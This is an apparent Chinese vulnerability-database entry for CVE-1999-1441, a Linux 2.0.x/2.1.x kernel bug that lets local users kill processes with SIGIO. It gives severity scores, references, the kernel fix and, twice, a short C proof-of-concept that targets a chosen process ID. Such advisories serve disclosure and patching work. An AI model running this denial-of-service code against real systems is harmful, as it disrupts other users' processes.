CVE-1999-1441
CVSS2.1
发布时间 :1998-06-30 00:00:00
修订时间 :2016-10-17 22:04:36
NMCOES    

[原文]Linux 2.0.34 does not properly prevent users from sending SIGIO signals to arbitrary processes, which allows local users to cause a denial of service by sending SIGIO to processes that do not catch it.


[CNNVD]多个供应商Linux SIGIO漏洞(CNNVD-199806-025)

        Linux 2.0.34不能正确的阻止用户发送SIGIO信号到任意进程,本地用户通过发送SIGIO到不捕获它的进程导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1441
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1441
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199806-025
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=90221103126047&w=2
(UNKNOWN)  BUGTRAQ  19980630 Serious Linux 2.0.34 security problem
http://www.securityfocus.com/bid/111
(UNKNOWN)  BID  111

- 漏洞信息

多个供应商Linux SIGIO漏洞
低危 其他
1998-06-30 00:00:00 2005-10-20 00:00:00
本地  
        Linux 2.0.34不能正确的阻止用户发送SIGIO信号到任意进程,本地用户通过发送SIGIO到不捕获它的进程导致服务拒绝。

- 公告与补丁

        The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
        is approximately 139.

- 漏洞信息 (19085)

Linux kernel 2.0/2.1 SIGIO Vulnerability (EDBID:19085)
linux dos
1998-06-30 Verified
0 David Luyer
N/A [点击下载]
source: http://www.securityfocus.com/bid/111/info

A vulnerability in the Linux kernel allows any user to send a SIGIO signal to any process. If the process does not catch or ignore the signal is will exit.

/* On non-glibc systems you must add
*
* #define O_ASYNC FASYNC
*/
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
int s, p;

if(argc != 2) {
fputs("Please specify a pid to send signal to.\n", stderr);
exit(0);
} else {
p = atoi(argv[1]);
}
fcntl(0,F_SETOWN,p);
s = fcntl(0,F_GETFL,0);
fcntl(0,F_SETFL,s|O_ASYNC);
printf("Sending SIGIO - press enter.\n");
getchar();
fcntl(0,F_SETFL,s&~O_ASYNC);
printf("SIGIO send attempted.\n");
return 0;
}		

- 漏洞信息

13528
Linux SIGIO Signal Arbitrary Process DoS
Denial of Service
Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

1998-06-30 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor Linux SIGIO Vulnerability
Access Validation Error 111
No No
1998-06-30 12:00:00 2009-07-11 12:16:00
The vulnerability was reported by David Luyer <luyer@ucs.uwa.edu.au> to the BugTraq mailing list on Tue, 30 Jun 1998.

- 受影响的程序版本

Linux kernel 2.1
Linux kernel 2.0

- 漏洞讨论

A vulnerability in the Linux kernel allows any user to send a SIGIO signal to any process. If the process does not catch or ignore the signal is will exit.

This vulnerability affects Linux 2.0.3[1-4] and 2.1.101+.

- 漏洞利用

/* On non-glibc systems you must add
*
* #define O_ASYNC FASYNC
*/
#include &lt;fcntl.h&gt;
#include &lt;errno.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;

int main(int argc, char *argv[]) {
int s, p;

if(argc != 2) {
fputs("Please specify a pid to send signal to.\n", stderr);
exit(0);
} else {
p = atoi(argv[1]);
}
fcntl(0,F_SETOWN,p);
s = fcntl(0,F_GETFL,0);
fcntl(0,F_SETFL,s|O_ASYNC);
printf("Sending SIGIO - press enter.\n");
getchar();
fcntl(0,F_SETFL,s&amp;~O_ASYNC);
printf("SIGIO send attempted.\n");
return 0;
}

- 解决方案

The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
is approximately 139.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站